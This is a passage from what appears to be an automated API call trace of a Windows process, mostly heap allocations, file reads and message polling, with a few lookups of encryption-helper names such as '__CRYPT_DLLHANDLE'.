| out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0176.220] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0176.222] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0176.224] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x2400, lpOverlapped=0x0) returned 1 [0176.224] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0176.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0176.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0176.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0176.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x42400) returned 0x9c5180 [0176.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0176.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0176.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0176.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0176.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0176.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0176.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x42400) returned 0xa7f018 [0176.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0176.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.234] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0176.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0176.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0176.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0176.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0176.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x42400) returned 0x9c5180 [0176.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0176.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0176.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0176.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0176.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.235] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0176.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0176.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0176.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0176.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0176.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0176.235] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0176.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0176.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0176.235] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0176.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0176.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0176.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0176.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2698 [0176.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0176.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0176.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0176.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0176.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x42400) returned 0x9c5180 [0176.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0176.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0176.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0176.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0176.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2688 [0176.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0176.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0176.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0176.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27c8 [0176.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0176.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0176.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0176.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4b0 [0176.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0176.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0176.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0176.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0176.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0176.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x42400) returned 0xac1420 [0176.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0176.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0176.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0176.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0176.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0176.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0176.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0176.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0176.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0176.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0176.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0176.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0176.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0176.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0176.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0176.243] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0176.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0176.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0176.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0176.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0176.243] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0176.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0176.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0176.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0176.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0176.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0176.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0176.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0176.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0176.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0176.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0176.305] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0176.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0176.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0176.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0176.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2888 [0176.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0176.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0176.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0176.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0176.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd378 [0176.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0176.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0176.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0176.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0176.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0176.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0176.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0176.306] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0176.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0176.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0176.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0176.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0176.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0176.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0176.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0176.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0176.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0176.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0176.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0176.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0176.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0176.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0176.307] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0176.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0176.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0176.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0176.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0176.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0176.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0176.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0176.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0176.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0176.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0176.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0176.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0176.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0176.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0176.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0176.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0176.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0176.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0176.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0176.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0176.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0176.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0176.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0176.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0176.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.308] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0176.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0176.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0176.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0176.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0176.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0176.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0176.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0176.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0176.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0176.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0176.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0176.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0176.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0176.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0176.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0176.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0176.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0176.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0176.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0176.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0176.309] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0176.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0176.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0176.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0176.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0176.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0176.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0176.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0176.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0176.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0176.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0176.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0176.310] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0176.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0176.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd558 [0176.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0176.310] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0176.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0176.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0176.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0176.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0176.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0176.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0176.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0176.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0176.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0176.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0176.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0176.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0176.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0176.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) 